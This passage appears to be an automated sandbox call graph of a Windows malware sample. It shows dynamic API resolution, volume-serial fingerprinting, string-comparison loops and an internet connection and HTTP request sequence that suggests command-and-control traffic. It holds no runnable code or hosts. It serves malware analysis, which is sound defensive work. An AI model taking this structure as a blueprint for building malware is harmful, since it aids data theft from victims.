14029->14030 14031 2e288f 14030->14031 14032 2e45c0 2 API calls 14031->14032 14033 2e28a8 14032->14033 14034 2e45c0 2 API calls 14033->14034 14035 2e28c1 14034->14035 14036 2e45c0 2 API calls 14035->14036 14037 2e28da 14036->14037 14038 2e45c0 2 API calls 14037->14038 14039 2e28f3 14038->14039 14040 2e45c0 2 API calls 14039->14040 14041 2e290c 14040->14041 14042 2e45c0 2 API calls 14041->14042 14043 2e2925 14042->14043 14044 2e45c0 2 API calls 14043->14044 14045 2e293e 14044->14045 14046 2e45c0 2 API calls 14045->14046 14047 2e2957 14046->14047 14048 2e45c0 2 API calls 14047->14048 14049 2e2970 14048->14049 14050 2e45c0 2 API calls 14049->14050 14051 2e2989 14050->14051 14052 2e45c0 2 API calls 14051->14052 14053 2e29a2 14052->14053 14054 2e45c0 2 API calls 14053->14054 14055 2e29bb 14054->14055 14056 2e45c0 2 API calls 14055->14056 14057 2e29d4 14056->14057 14058 2e45c0 2 API calls 14057->14058 14059 2e29ed 14058->14059 14060 2e45c0 2 API calls 14059->14060 14061 2e2a06 14060->14061 14062 2e45c0 2 API calls 14061->14062 14063 2e2a1f 14062->14063 14064 2e45c0 2 API calls 14063->14064 14065 2e2a38 14064->14065 14066 2e45c0 2 API calls 14065->14066 14067 2e2a51 14066->14067 14068 2e45c0 2 API calls 14067->14068 14069 2e2a6a 14068->14069 14070 2e45c0 2 API calls 14069->14070 14071 2e2a83 14070->14071 14072 2e45c0 2 API calls 14071->14072 14073 2e2a9c 14072->14073 14074 2e45c0 2 API calls 14073->14074 14075 2e2ab5 14074->14075 14076 2e45c0 2 API calls 14075->14076 14077 2e2ace 14076->14077 14078 2e45c0 2 API calls 14077->14078 14079 2e2ae7 14078->14079 14080 2e45c0 2 API calls 14079->14080 14081 2e2b00 14080->14081 14082 2e45c0 2 API calls 14081->14082 14083 2e2b19 14082->14083 14084 2e45c0 2 API calls 14083->14084 14085 2e2b32 14084->14085 14086 2e45c0 2 API calls 14085->14086 14087 2e2b4b 14086->14087 14088 2e45c0 2 API calls 14087->14088 14089 2e2b64 14088->14089 14090 2e45c0 2 API calls 14089->14090 14091 2e2b7d 14090->14091 14092 2e45c0 2 API calls 14091->14092 14093 2e2b96 14092->14093 14094 2e45c0 2 API calls 14093->14094 14095 2e2baf 14094->14095 14096 2e45c0 2 API calls 14095->14096 14097 2e2bc8 14096->14097 14098 2e45c0 2 API calls 14097->14098 14099 2e2be1 14098->14099 14100 2e45c0 2 API calls 14099->14100 14101 2e2bfa 14100->14101 14102 2e45c0 2 API calls 14101->14102 14103 2e2c13 14102->14103 14104 2e45c0 2 API calls 14103->14104 14105 2e2c2c 14104->14105 14106 2e45c0 2 API calls 14105->14106 14107 2e2c45 14106->14107 14108 2e45c0 2 API calls 14107->14108 14109 2e2c5e 14108->14109 14110 2e45c0 2 API calls 14109->14110 14111 2e2c77 14110->14111 14112 2e45c0 2 API calls 14111->14112 14113 2e2c90 14112->14113 14114 2e45c0 2 API calls 14113->14114 14115 2e2ca9 14114->14115 14116 2e45c0 2 API calls 14115->14116 14117 2e2cc2 14116->14117 14118 2e45c0 2 API calls 14117->14118 14119 2e2cdb 14118->14119 14120 2e45c0 2 API calls 14119->14120 14121 2e2cf4 14120->14121 14122 2e45c0 2 API calls 14121->14122 14123 2e2d0d 14122->14123 14124 2e45c0 2 API calls 14123->14124 14125 2e2d26 14124->14125 14126 2e45c0 2 API calls 14125->14126 14127 2e2d3f 14126->14127 14128 2e45c0 2 API calls 14127->14128 14129 2e2d58 14128->14129 14130 2e45c0 2 API calls 14129->14130 14131 2e2d71 14130->14131 14132 2e45c0 2 API calls 14131->14132 14133 2e2d8a 14132->14133 14134 2e45c0 2 API calls 14133->14134 14135 2e2da3 14134->14135 14136 2e45c0 2 API calls 14135->14136 14137 2e2dbc 14136->14137 14138 2e45c0 2 API calls 14137->14138 14139 2e2dd5 14138->14139 14140 2e45c0 2 API calls 14139->14140 14141 2e2dee 14140->14141 14142 2e45c0 2 API calls 14141->14142 14143 2e2e07 14142->14143 14144 2e45c0 2 API calls 14143->14144 14145 2e2e20 14144->14145 14146 2e45c0 2 API calls 14145->14146 14147 2e2e39 14146->14147 14148 2e45c0 2 API calls 14147->14148 14149 2e2e52 14148->14149 14150 2e45c0 2 API calls 14149->14150 14151 2e2e6b 14150->14151 14152 2e45c0 2 API calls 14151->14152 14153 2e2e84 14152->14153 14154 2e45c0 2 API calls 14153->14154 14155 2e2e9d 14154->14155 14156 2e45c0 2 API calls 14155->14156 14157 2e2eb6 14156->14157 14158 2e45c0 2 API calls 14157->14158 14159 2e2ecf 14158->14159 14160 2e45c0 2 API calls 14159->14160 14161 2e2ee8 14160->14161 14162 2e45c0 2 API calls 14161->14162 14163 2e2f01 14162->14163 14164 2e45c0 2 API calls 14163->14164 14165 2e2f1a 14164->14165 14166 2e45c0 2 API calls 14165->14166 14167 2e2f33 14166->14167 14168 2e45c0 2 API calls 14167->14168 14169 2e2f4c 14168->14169 14170 2e45c0 2 API calls 14169->14170 14171 2e2f65 14170->14171 14172 2e45c0 2 API calls 14171->14172 14173 2e2f7e 14172->14173 14174 2e45c0 2 API calls 14173->14174 14175 2e2f97 14174->14175 14176 2e45c0 2 API calls 14175->14176 14177 2e2fb0 14176->14177 14178 2e45c0 2 API calls 14177->14178 14179 2e2fc9 14178->14179 14180 2e45c0 2 API calls 14179->14180 14181 2e2fe2 14180->14181 14182 2e45c0 2 API calls 14181->14182 14183 2e2ffb 14182->14183 14184 2e45c0 2 API calls 14183->14184 14185 2e3014 14184->14185 14186 2e45c0 2 API calls 14185->14186 14187 2e302d 14186->14187 14188 2e45c0 2 API calls 14187->14188 14189 2e3046 14188->14189 14190 2e45c0 2 API calls 14189->14190 14191 2e305f 14190->14191 14192 2e45c0 2 API calls 14191->14192 14193 2e3078 14192->14193 14194 2e45c0 2 API calls 14193->14194 14195 2e3091 14194->14195 14196 2e45c0 2 API calls 14195->14196 14197 2e30aa 14196->14197 14198 2e45c0 2 API calls 14197->14198 14199 2e30c3 14198->14199 14200 2e45c0 2 API calls 14199->14200 14201 2e30dc 14200->14201 14202 2e45c0 2 API calls 14201->14202 14203 2e30f5 14202->14203 14204 2e45c0 2 API calls 14203->14204 14205 2e310e 14204->14205 14206 2e45c0 2 API calls 14205->14206 14207 2e3127 14206->14207 14208 2e45c0 2 API calls 14207->14208 14209 2e3140 14208->14209 14210 2e45c0 2 API calls 14209->14210 14211 2e3159 14210->14211 14212 2e45c0 2 API calls 14211->14212 14213 2e3172 14212->14213 14214 2e45c0 2 API calls 14213->14214 14215 2e318b 14214->14215 14216 2e45c0 2 API calls 14215->14216 14217 2e31a4 14216->14217 14218 2e45c0 2 API calls 14217->14218 14219 2e31bd 14218->14219 14220 2e45c0 2 API calls 14219->14220 14221 2e31d6 14220->14221 14222 2e45c0 2 API calls 14221->14222 14223 2e31ef 14222->14223 14224 2e45c0 2 API calls 14223->14224 14225 2e3208 14224->14225 14226 2e45c0 2 API calls 14225->14226 14227 2e3221 14226->14227 14228 2e45c0 2 API calls 14227->14228 14229 2e323a 14228->14229 14230 2e45c0 2 API calls 14229->14230 14231 2e3253 14230->14231 14232 2e45c0 2 API calls 14231->14232 14233 2e326c 14232->14233 14234 2e45c0 2 API calls 14233->14234 14235 2e3285 14234->14235 14236 2e45c0 2 API calls 14235->14236 14237 2e329e 14236->14237 14238 2e45c0 2 API calls 14237->14238 14239 2e32b7 14238->14239 14240 2e45c0 2 API calls 14239->14240 14241 2e32d0 14240->14241 14242 2e45c0 2 API calls 14241->14242 14243 2e32e9 14242->14243 14244 2e45c0 2 API calls 14243->14244 14245 2e3302 14244->14245 14246 2e45c0 2 API calls 14245->14246 14247 2e331b 14246->14247 14248 2e45c0 2 API calls 14247->14248 14249 2e3334 14248->14249 14250 2e45c0 2 API calls 14249->14250 14251 2e334d 14250->14251 14252 2e45c0 2 API calls 14251->14252 14253 2e3366 14252->14253 14254 2e45c0 2 API calls 14253->14254 14255 2e337f 14254->14255 14256 2e45c0 2 API calls 14255->14256 14257 2e3398 14256->14257 14258 2e45c0 2 API calls 14257->14258 14259 2e33b1 14258->14259 14260 2e45c0 2 API calls 14259->14260 14261 2e33ca 14260->14261 14262 2e45c0 2 API calls 14261->14262 14263 2e33e3 14262->14263 14264 2e45c0 2 API calls 14263->14264 14265 2e33fc 14264->14265 14266 2e45c0 2 API calls 14265->14266 14267 2e3415 14266->14267 14268 2e45c0 2 API calls 14267->14268 14269 2e342e 14268->14269 14270 2e45c0 2 API calls 14269->14270 14271 2e3447 14270->14271 14272 2e45c0 2 API calls 14271->14272 14273 2e3460 14272->14273 14274 2e45c0 2 API calls 14273->14274 14275 2e3479 14274->14275 14276 2e45c0 2 API calls 14275->14276 14277 2e3492 14276->14277 14278 2e45c0 2 API calls 14277->14278 14279 2e34ab 14278->14279 14280 2e45c0 2 API calls 14279->14280 14281 2e34c4 14280->14281 14282 2e45c0 2 API calls 14281->14282 14283 2e34dd 14282->14283 14284 2e45c0 2 API calls 14283->14284 14285 2e34f6 14284->14285 14286 2e45c0 2 API calls 14285->14286 14287 2e350f 14286->14287 14288 2e45c0 2 API calls 14287->14288 14289 2e3528 14288->14289 14290 2e45c0 2 API calls 14289->14290 14291 2e3541 14290->14291 14292 2e45c0 2 API calls 14291->14292 14293 2e355a 14292->14293 14294 2e45c0 2 API calls 14293->14294 14295 2e3573 14294->14295 14296 2e45c0 2 API calls 14295->14296 14297 2e358c 14296->14297 14298 2e45c0 2 API calls 14297->14298 14299 2e35a5 14298->14299 14300 2e45c0 2 API calls 14299->14300 14301 2e35be 14300->14301 14302 2e45c0 2 API calls 14301->14302 14303 2e35d7 14302->14303 14304 2e45c0 2 API calls 14303->14304 14305 2e35f0 14304->14305 14306 2e45c0 2 API calls 14305->14306 14307 2e3609 14306->14307 14308 2e45c0 2 API calls 14307->14308 14309 2e3622 14308->14309 14310 2e45c0 2 API calls 14309->14310 14311 2e363b 14310->14311 14312 2e45c0 2 API calls 14311->14312 14313 2e3654 14312->14313 14314 2e45c0 2 API calls 14313->14314 14315 2e366d 14314->14315 14316 2e45c0 2 API calls 14315->14316 14317 2e3686 14316->14317 14318 2e45c0 2 API calls 14317->14318 14319 2e369f 14318->14319 14320 2e45c0 2 API calls 14319->14320 14321 2e36b8 14320->14321 14322 2e45c0 2 API calls 14321->14322 14323 2e36d1 14322->14323 14324 2e45c0 2 API calls 14323->14324 14325 2e36ea 14324->14325 14326 2e45c0 2 API calls 14325->14326 14327 2e3703 14326->14327 14328 2e45c0 2 API calls 14327->14328 14329 2e371c 14328->14329 14330 2e45c0 2 API calls 14329->14330 14331 2e3735 14330->14331 14332 2e45c0 2 API calls 14331->14332 14333 2e374e 14332->14333 14334 2e45c0 2 API calls 14333->14334 14335 2e3767 14334->14335 14336 2e45c0 2 API calls 14335->14336 14337 2e3780 14336->14337 14338 2e45c0 2 API calls 14337->14338 14339 2e3799 14338->14339 14340 2e45c0 2 API calls 14339->14340 14341 2e37b2 14340->14341 14342 2e45c0 2 API calls 14341->14342 14343 2e37cb 14342->14343 14344 2e45c0 2 API calls 14343->14344 14345 2e37e4 14344->14345 14346 2e45c0 2 API calls 14345->14346 14347 2e37fd 14346->14347 14348 2e45c0 2 API calls 14347->14348 14349 2e3816 14348->14349 14350 2e45c0 2 API calls 14349->14350 14351 2e382f 14350->14351 14352 2e45c0 2 API calls 14351->14352 14353 2e3848 14352->14353 14354 2e45c0 2 API calls 14353->14354 14355 2e3861 14354->14355 14356 2e45c0 2 API calls 14355->14356 14357 2e387a 14356->14357 14358 2e45c0 2 API calls 14357->14358 14359 2e3893 14358->14359 14360 2e45c0 2 API calls 14359->14360 14361 2e38ac 14360->14361 14362 2e45c0 2 API calls 14361->14362 14363 2e38c5 14362->14363 14364 2e45c0 2 API calls 14363->14364 14365 2e38de 14364->14365 14366 2e45c0 2 API calls 14365->14366 14367 2e38f7 14366->14367 14368 2e45c0 2 API calls 14367->14368 14369 2e3910 14368->14369 14370 2e45c0 2 API calls 14369->14370 14371 2e3929 14370->14371 14372 2e45c0 2 API calls 14371->14372 14373 2e3942 14372->14373 14374 2e45c0 2 API calls 14373->14374 14375 2e395b 14374->14375 14376 2e45c0 2 API calls 14375->14376 14377 2e3974 14376->14377 14378 2e45c0 2 API calls 14377->14378 14379 2e398d 14378->14379 14380 2e45c0 2 API calls 14379->14380 14381 2e39a6 14380->14381 14382 2e45c0 2 API calls 14381->14382 14383 2e39bf 14382->14383 14384 2e45c0 2 API calls 14383->14384 14385 2e39d8 14384->14385 14386 2e45c0 2 API calls 14385->14386 14387 2e39f1 14386->14387 14388 2e45c0 2 API calls 14387->14388 14389 2e3a0a 14388->14389 14390 2e45c0 2 API calls 14389->14390 14391 2e3a23 14390->14391 14392 2e45c0 2 API calls 14391->14392 14393 2e3a3c 14392->14393 14394 2e45c0 2 API calls 14393->14394 14395 2e3a55 14394->14395 14396 2e45c0 2 API calls 14395->14396 14397 2e3a6e 14396->14397 14398 2e45c0 2 API calls 14397->14398 14399 2e3a87 14398->14399 14400 2e45c0 2 API calls 14399->14400 14401 2e3aa0 14400->14401 14402 2e45c0 2 API calls 14401->14402 14403 2e3ab9 14402->14403 14404 2e45c0 2 API calls 14403->14404 14405 2e3ad2 14404->14405 14406 2e45c0 2 API calls 14405->14406 14407 2e3aeb 14406->14407 14408 2e45c0 2 API calls 14407->14408 14409 2e3b04 14408->14409 14410 2e45c0 2 API calls 14409->14410 14411 2e3b1d 14410->14411 14412 2e45c0 2 API calls 14411->14412 14413 2e3b36 14412->14413 14414 2e45c0 2 API calls 14413->14414 14415 2e3b4f 14414->14415 14416 2e45c0 2 API calls 14415->14416 14417 2e3b68 14416->14417 14418 2e45c0 2 API calls 14417->14418 14419 2e3b81 14418->14419 14420 2e45c0 2 API calls 14419->14420 14421 2e3b9a 14420->14421 14422 2e45c0 2 API calls 14421->14422 14423 2e3bb3 14422->14423 14424 2e45c0 2 API calls 14423->14424 14425 2e3bcc 14424->14425 14426 2e45c0 2 API calls 14425->14426 14427 2e3be5 14426->14427 14428 2e45c0 2 API calls 14427->14428 14429 2e3bfe 14428->14429 14430 2e45c0 2 API calls 14429->14430 14431 2e3c17 14430->14431 14432 2e45c0 2 API calls 14431->14432 14433 2e3c30 14432->14433 14434 2e45c0 2 API calls 14433->14434 14435 2e3c49 14434->14435 14436 2e45c0 2 API calls 14435->14436 14437 2e3c62 14436->14437 14438 2e45c0 2 API calls 14437->14438 14439 2e3c7b 14438->14439 14440 2e45c0 2 API calls 14439->14440 14441 2e3c94 14440->14441 14442 2e45c0 2 API calls 14441->14442 14443 2e3cad 14442->14443 14444 2e45c0 2 API calls 14443->14444 14445 2e3cc6 14444->14445 14446 2e45c0 2 API calls 14445->14446 14447 2e3cdf 14446->14447 14448 2e45c0 2 API calls 14447->14448 14449 2e3cf8 14448->14449 14450 2e45c0 2 API calls 14449->14450 14451 2e3d11 14450->14451 14452 2e45c0 2 API calls 14451->14452 14453 2e3d2a 14452->14453 14454 2e45c0 2 API calls 14453->14454 14455 2e3d43 14454->14455 14456 2e45c0 2 API calls 14455->14456 14457 2e3d5c 14456->14457 14458 2e45c0 2 API calls 14457->14458 14459 2e3d75 14458->14459 14460 2e45c0 2 API calls 14459->14460 14461 2e3d8e 14460->14461 14462 2e45c0 2 API calls 14461->14462 14463 2e3da7 14462->14463 14464 2e45c0 2 API calls 14463->14464 14465 2e3dc0 14464->14465 14466 2e45c0 2 API calls 14465->14466 14467 2e3dd9 14466->14467 14468 2e45c0 2 API calls 14467->14468 14469 2e3df2 14468->14469 14470 2e45c0 2 API calls 14469->14470 14471 2e3e0b 14470->14471 14472 2e45c0 2 API calls 14471->14472 14473 2e3e24 14472->14473 14474 2e45c0 2 API calls 14473->14474 14475 2e3e3d 14474->14475 14476 2e45c0 2 API calls 14475->14476 14477 2e3e56 14476->14477 14478 2e45c0 2 API calls 14477->14478 14479 2e3e6f 14478->14479 14480 2e45c0 2 API calls 14479->14480 14481 2e3e88 14480->14481 14482 2e45c0 2 API calls 14481->14482 14483 2e3ea1 14482->14483 14484 2e45c0 2 API calls 14483->14484 14485 2e3eba 14484->14485 14486 2e45c0 2 API calls 14485->14486 14487 2e3ed3 14486->14487 14488 2e45c0 2 API calls 14487->14488 14489 2e3eec 14488->14489 14490 2e45c0 2 API calls 14489->14490 14491 2e3f05 14490->14491 14492 2e45c0 2 API calls 14491->14492 14493 2e3f1e 14492->14493 14494 2e45c0 2 API calls 14493->14494 14495 2e3f37 14494->14495 14496 2e45c0 2 API calls 14495->14496 14497 2e3f50 14496->14497 14498 2e45c0 2 API calls 14497->14498 14499 2e3f69 14498->14499 14500 2e45c0 2 API calls 14499->14500 14501 2e3f82 14500->14501 14502 2e45c0 2 API calls 14501->14502 14503 2e3f9b 14502->14503 14504 2e45c0 2 API calls 14503->14504 14505 2e3fb4 14504->14505 14506 2e45c0 2 API calls 14505->14506 14507 2e3fcd 14506->14507 14508 2e45c0 2 API calls 14507->14508 14509 2e3fe6 14508->14509 14510 2e45c0 2 API calls 14509->14510 14511 2e3fff 14510->14511 14512 2e45c0 2 API calls 14511->14512 14513 2e4018 14512->14513 14514 2e45c0 2 API calls 14513->14514 14515 2e4031 14514->14515 14516 2e45c0 2 API calls 14515->14516 14517 2e404a 14516->14517 14518 2e45c0 2 API calls 14517->14518 14519 2e4063 14518->14519 14520 2e45c0 2 API calls 14519->14520 14521 2e407c 14520->14521 14522 2e45c0 2 API calls 14521->14522 14523 2e4095 14522->14523 14524 2e45c0 2 API calls 14523->14524 14525 2e40ae 14524->14525 14526 2e45c0 2 API calls 14525->14526 14527 2e40c7 14526->14527 14528 2e45c0 2 API calls 14527->14528 14529 2e40e0 14528->14529 14530 2e45c0 2 API calls 14529->14530 14531 2e40f9 14530->14531 14532 2e45c0 2 API calls 14531->14532 14533 2e4112 14532->14533 14534 2e45c0 2 API calls 14533->14534 14535 2e412b 14534->14535 14536 2e45c0 2 API calls 14535->14536 14537 2e4144 14536->14537 14538 2e45c0 2 API calls 14537->14538 14539 2e415d 14538->14539 14540 2e45c0 2 API calls 14539->14540 14541 2e4176 14540->14541 14542 2e45c0 2 API calls 14541->14542 14543 2e418f 14542->14543 14544 2e45c0 2 API calls 14543->14544 14545 2e41a8 14544->14545 14546 2e45c0 2 API calls 14545->14546 14547 2e41c1 14546->14547 14548 2e45c0 2 API calls 14547->14548 14549 2e41da 14548->14549 14550 2e45c0 2 API calls 14549->14550 14551 2e41f3 14550->14551 14552 2e45c0 2 API calls 14551->14552 14553 2e420c 14552->14553 14554 2e45c0 2 API calls 14553->14554 14555 2e4225 14554->14555 14556 2e45c0 2 API calls 14555->14556 14557 2e423e 14556->14557 14558 2e45c0 2 API calls 14557->14558 14559 2e4257 14558->14559 14560 2e45c0 2 API calls 14559->14560 14561 2e4270 14560->14561 14562 2e45c0 2 API calls 14561->14562 14563 2e4289 14562->14563 14564 2e45c0 2 API calls 14563->14564 14565 2e42a2 14564->14565 14566 2e45c0 2 API calls 14565->14566 14567 2e42bb 14566->14567 14568 2e45c0 2 API calls 14567->14568 14569 2e42d4 14568->14569 14570 2e45c0 2 API calls 14569->14570 14571 2e42ed 14570->14571 14572 2e45c0 2 API calls 14571->14572 14573 2e4306 14572->14573 14574 2e45c0 2 API calls 14573->14574 14575 2e431f 14574->14575 14576 2e45c0 2 API calls 14575->14576 14577 2e4338 14576->14577 14578 2e45c0 2 API calls 14577->14578 14579 2e4351 14578->14579 14580 2e45c0 2 API calls 14579->14580 14581 2e436a 14580->14581 14582 2e45c0 2 API calls 14581->14582 14583 2e4383 14582->14583 14584 2e45c0 2 API calls 14583->14584 14585 2e439c 14584->14585 14586 2e45c0 2 API calls 14585->14586 14587 2e43b5 14586->14587 14588 2e45c0 2 API calls 14587->14588 14589 2e43ce 14588->14589 14590 2e45c0 2 API calls 14589->14590 14591 2e43e7 14590->14591 14592 2e45c0 2 API calls 14591->14592 14593 2e4400 14592->14593 14594 2e45c0 2 API calls 14593->14594 14595 2e4419 14594->14595 14596 2e45c0 2 API calls 14595->14596 14597 2e4432 14596->14597 14598 2e45c0 2 API calls 14597->14598 14599 2e444b 14598->14599 14600 2e45c0 2 API calls 14599->14600 14601 2e4464 14600->14601 14602 2e45c0 2 API calls 14601->14602 14603 2e447d 14602->14603 14604 2e45c0 2 API calls 14603->14604 14605 2e4496 14604->14605 14606 2e45c0 2 API calls 14605->14606 14607 2e44af 14606->14607 14608 2e45c0 2 API calls 14607->14608 14609 2e44c8 14608->14609 14610 2e45c0 2 API calls 14609->14610 14611 2e44e1 14610->14611 14612 2e45c0 2 API calls 14611->14612 14613 2e44fa 14612->14613 14614 2e45c0 2 API calls 14613->14614 14615 2e4513 14614->14615 14616 2e45c0 2 API calls 14615->14616 14617 2e452c 14616->14617 14618 2e45c0 2 API calls 14617->14618 14619 2e4545 14618->14619 14620 2e45c0 2 API calls 14619->14620 14621 2e455e 14620->14621 14622 2e45c0 2 API calls 14621->14622 14623 2e4577 14622->14623 14624 2e45c0 2 API calls 14623->14624 14625 2e4590 14624->14625 14626 2e45c0 2 API calls 14625->14626 14627 2e45a9 14626->14627 14628 2f9c10 14627->14628 14629 2fa036 8 API calls 14628->14629 14630 2f9c20 43 API calls 14628->14630 14631 2fa0cc GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 14629->14631 14632 2fa146 14629->14632 14630->14629 14631->14632 14633 2fa216 14632->14633 14634 2fa153 8 API calls 14632->14634 14635 2fa21f GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 14633->14635 14636 2fa298 14633->14636 14634->14633 14635->14636 14637 2fa337 14636->14637 14638 2fa2a5 6 API calls 14636->14638 14639 2fa41f 14637->14639 14640 2fa344 9 API calls 14637->14640 14638->14637 14641 2fa428 GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 14639->14641 14642 2fa4a2 14639->14642 14640->14639 14641->14642 14643 2fa4dc 14642->14643 14644 2fa4ab GetProcAddress GetProcAddress 14642->14644 14645 2fa515 14643->14645 14646 2fa4e5 GetProcAddress GetProcAddress 14643->14646 14644->14643 14647 2fa612 14645->14647 14648 2fa522 10 API calls 14645->14648 14646->14645 14649 2fa67d 14647->14649 14650 2fa61b GetProcAddress GetProcAddress GetProcAddress GetProcAddress 14647->14650 14648->14647 14651 2fa69e 14649->14651 14652 2fa686 GetProcAddress 14649->14652 14650->14649 14653 2f5ca3 14651->14653 14654 2fa6a7 GetProcAddress GetProcAddress GetProcAddress GetProcAddress 14651->14654 14652->14651 14655 2e1590 14653->14655 14654->14653 15776 2e1670 14655->15776 14658 2fa7a0 lstrcpy 14659 2e15b5 14658->14659 14660 2fa7a0 lstrcpy 14659->14660 14661 2e15c7 14660->14661 14662 2fa7a0 lstrcpy 14661->14662 14663 2e15d9 14662->14663 14664 2fa7a0 lstrcpy 14663->14664 14665 2e1663 14664->14665 14666 2f5510 14665->14666 14667 2f5521 14666->14667 14668 2fa820 2 API calls 14667->14668 14669 2f552e 14668->14669 14670 2fa820 2 API calls 14669->14670 14671 2f553b 14670->14671 14672 2fa820 2 API calls 14671->14672 14673 2f5548 14672->14673 14674 2fa740 lstrcpy 14673->14674 14675 2f5555 14674->14675 14676 2fa740 lstrcpy 14675->14676 14677 2f5562 14676->14677 14678 2fa740 lstrcpy 14677->14678 14679 2f556f 14678->14679 14680 2fa740 lstrcpy 14679->14680 14708 2f557c 14680->14708 14681 2fa7a0 lstrcpy 14681->14708 14682 2f5643 StrCmpCA 14682->14708 14683 2f56a0 StrCmpCA 14684 2f57dc 14683->14684 14683->14708 14685 2fa8a0 lstrcpy 14684->14685 14686 2f57e8 14685->14686 14687 2fa820 2 API calls 14686->14687 14689 2f57f6 14687->14689 14688 2fa820 lstrlen lstrcpy 14688->14708 14691 2fa820 2 API calls 14689->14691 14690 2f5856 StrCmpCA 14692 2f5991 14690->14692 14690->14708 14695 2f5805 14691->14695 14694 2fa8a0 lstrcpy 14692->14694 14693 2fa740 lstrcpy 14693->14708 14696 2f599d 14694->14696 14697 2e1670 lstrcpy 14695->14697 14698 2fa820 2 API calls 14696->14698 14718 2f5811 14697->14718 14699 2f59ab 14698->14699 14702 2fa820 2 API calls 14699->14702 14700 2f5a0b StrCmpCA 14703 2f5a28 14700->14703 14704 2f5a16 Sleep 14700->14704 14701 2f52c0 25 API calls 14701->14708 14705 2f59ba 14702->14705 14706 2fa8a0 lstrcpy 14703->14706 14704->14708 14709 2e1670 lstrcpy 14705->14709 14710 2f5a34 14706->14710 14707 2e1590 lstrcpy 14707->14708 14708->14681 14708->14682 14708->14683 14708->14688 14708->14690 14708->14693 14708->14700 14708->14701 14708->14707 14715 2fa8a0 lstrcpy 14708->14715 14716 2f578a StrCmpCA 14708->14716 14719 2f593f StrCmpCA 14708->14719 14720 2f51f0 20 API calls 14708->14720 14709->14718 14711 2fa820 2 API calls 14710->14711 14712 2f5a43 14711->14712 14713 2fa820 2 API calls 14712->14713 14714 2f5a52 14713->14714 14717 2e1670 lstrcpy 14714->14717 14715->14708 14716->14708 14717->14718 14718->13773 14719->14708 14720->14708 14722 2f754c 14721->14722 14723 2f7553 GetVolumeInformationA 14721->14723 14722->14723 14724 2f7591 14723->14724 14725 2f75fc GetProcessHeap RtlAllocateHeap 14724->14725 14726 2f7619 14725->14726 14727 2f7628 wsprintfA 14725->14727 14728 2fa740 lstrcpy 14726->14728 14729 2fa740 lstrcpy 14727->14729 14730 2f5da7 14728->14730 14729->14730 14730->13794 14732 2fa7a0 lstrcpy 14731->14732 14733 2e4899 14732->14733 15785 2e47b0 14733->15785 14735 2e48a5 14736 2fa740 lstrcpy 14735->14736 14737 2e48d7 14736->14737 14738 2fa740 lstrcpy 14737->14738 14739 2e48e4 14738->14739 14740 2fa740 lstrcpy 14739->14740 14741 2e48f1 14740->14741 14742 2fa740 lstrcpy 14741->14742 14743 2e48fe 14742->14743 14744 2fa740 lstrcpy 14743->14744 14745 2e490b InternetOpenA StrCmpCA 14744->14745 14746 2e4944 14745->14746 14747 2e4ecb InternetCloseHandle 14746->14747 15791 2f8b60 14746->15791 14749 2e4ee8 14747->14749 15806 2e9ac0 CryptStringToBinaryA 14749->15806 14750 2e4963 15799 2fa920 14750->15799 14754 2e4976 14755 2fa8a0 lstrcpy 14754->14755 14760 2e497f 14755->14760 14756 2fa820 2 API calls 14757 2e4f05 14756->14757 14758 2fa9b0 4 API calls 14757->14758 14761 2e4f1b 14758->14761 14759 2e4f27 codecvt 14762 2fa7a0 lstrcpy 14759->14762 14764 2fa9b0 4 API calls 14760->14764 14763 2fa8a0 lstrcpy 14761->14763 14775 2e4f57 14762->14775 14763->14759 14765 2e49a9 14764->14765 14766 2fa8a0 lstrcpy 14765->14766 14767 2e49b2 14766->14767 14768 2fa9b0 4 API calls 14767->14768 14769 2e49d1 14768->14769 14770 2fa8a0 lstrcpy 14769->14770 14771 2e49da 14770->14771 14772 2fa920 3 API calls 14771->14772 14773 2e49f8 14772->14773 14774 2fa8a0 lstrcpy 14773->14774 14776 2e4a01 14774->14776 14775->13797 14777 2fa9b0 4 API calls 14776->14777 14778 2e4a20 14777->14778 14779 2fa8a0 lstrcpy 14778->14779 14780 2e4a29 14779->14780 14781 2fa9b0 4 API calls 14780->14781 14782 2e4a48 14781->14782 14783 2fa8a0 lstrcpy 14782->14783 14784 2e4a51 14783->14784 14785 2fa9b0 4 API calls 14784->14785 14786 2e4a7d 14785->14786 14787 2fa920 3 API calls 14786->14787 14788 2e4a84 14787->14788 14789 2fa8a0 lstrcpy 14788->14789 14790 2e4a8d 14789->14790 14791 2e4aa3 InternetConnectA 14790->14791 14791->14747 14792 2e4ad3 HttpOpenRequestA 14791->14792 14794 2e4ebe InternetCloseHandle 14792->14794 14795 2e4b28 14792->14795 14794->14747 14796 2fa9b0 4 API calls 14795->14796 14797 2e4b3c 14796->14797 14798 2fa8a0 lstrcpy 14797->14798 14799 2e4b45 14798->14799 14800 2fa920 3 API calls 14799->14800 14801 2e4b63 14800->14801 14802 2fa8a0 lstrcpy 14801->14802 14803 2e4b6c 14802->14803 14804 2fa9b0 4 API calls 14803->14804 14805 2e4b8b 14804->14805 14806 2fa8a0 lstrcpy 14805->14806 14807 2e4b94 14806->14807 14808 2fa9b0 4 API calls 14807->14808 14809 2e4bb5 14808->14809 14810 2fa8a0 lstrcpy 14809->14810 14811 2e4bbe 14810->14811 14812 2fa9b0 4 API calls 14811->14812 14813 2e4bde 14812->14813 14814 2fa8a0 lstrcpy 14813->14814 14815 2e4be7 14814->14815 14816 2fa9b0 4 API calls 14815->14816 14817 2e4c06 14816->14817 14818 2fa8a0 lstrcpy 14817->14818 14819 2e4c0f 14818->14819 14820 2fa920 3 API calls 14819->14820 14821 2e4c2d 14820->14821 14822 2fa8a0 lstrcpy 14821->14822 14823 2e4c36 14822->14823 14824 2fa9b0 4 API calls 14823->14824 14825 2e4c55 14824->14825 14826 2fa8a0 lstrcpy 14825->14826 14827 2e4c5e 14826->14827 14828 2fa9b0 4 API calls 14827->14828 14829 2e4c7d 14828->14829 14830 2fa8a0 lstrcpy 14829->14830 14831 2e4c86 14830->14831 14832 2fa920 3 API calls 14831->14832 14833 2e4ca4 14832->14833 14834 2fa8a0 lstrcpy 14833->14834 14835 2e4cad 14834->14835 14836 2fa9b0 4 API calls 14835->14836 14837 2e4ccc 14836->14837 14838 2fa8a0 lstrcpy 14837->14838 14839 2e4cd5 14838->14839 14840 2fa9b0 4 API calls 14839->14840 14841 2e4cf6 14840->14841 14842 2fa8a0 lstrcpy 14841->14842 14843 2e4cff 14842->14843 14844 2fa9b0 4 API calls 14843->14844 14845 2e4d1f 